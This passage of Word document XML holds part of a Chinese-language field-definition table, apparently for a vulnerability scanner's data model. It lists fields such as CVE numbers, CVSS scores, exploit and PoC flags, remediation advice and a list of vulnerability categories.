              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>附录2</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65DE2C1D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70D67609" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>remedDescription</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E7B19B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0396C220" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49A1F91A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="198B7BCA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174F544A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hasExp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5961691B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="090A22EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64EAAA13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否存在exp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19E3221C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1718A28B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27205DC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FBA6660" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF62480" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否内核漏洞（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E513558" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A05D52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>localEscalation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5828E1C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3369E0EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE63A22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否本地提权（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="646B1C5C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7848B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D8A3C7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B3F8776" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3CA3F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否远程执行（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CA6D054" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2BE942" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hasPoc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BA08223" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17AD479E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DA13623" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>存在</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0451FDA7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06930AD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cvssScore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5213E2A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE9EC04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1031C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53785BAA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="587CB427" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="431816C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E2DDB1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103B715B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B182588" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B617E05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>refs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762C69EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20E84FFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mediumblob</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B515AE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>引用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4EDC6789" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7864AA4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>expRefs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E601EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE48C2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE2AB8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参考连接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CCEEA72" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="787CE3D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cves</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3D6640" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50889977" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23743982" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>CVE编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="046E380C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6904F66C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6E735C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E4C805D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07E55804" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">漏洞类型:0 SQL注入,1 未授权访问,2 敏感信息泄露,3 XML外部实体注入,4 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>跨站脚本</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">攻击,5 不安全的反序列,6 客户端请求伪造,7 服务端请求伪造,8 命令执行,9 代码执行,10 任意文件上传,11 任意文件读取,12 拒绝服务攻击,13 目录遍历,14 恶意后门,15 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>本地提权</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,16 注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="151F9970" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1368C661" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="358F3C8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5312A15F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinytext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC5A38A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>利用条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="121BAD67" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="784E08EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B91827" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BE088E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FEFEB1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>受影响应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5449C9E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD7F12E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocCheckResults</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594C445B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DE73E4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B4E4215" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POC检测结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AF41383" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD2F464" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F65B86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5621EA30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E220A5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34D7694F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709D42F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
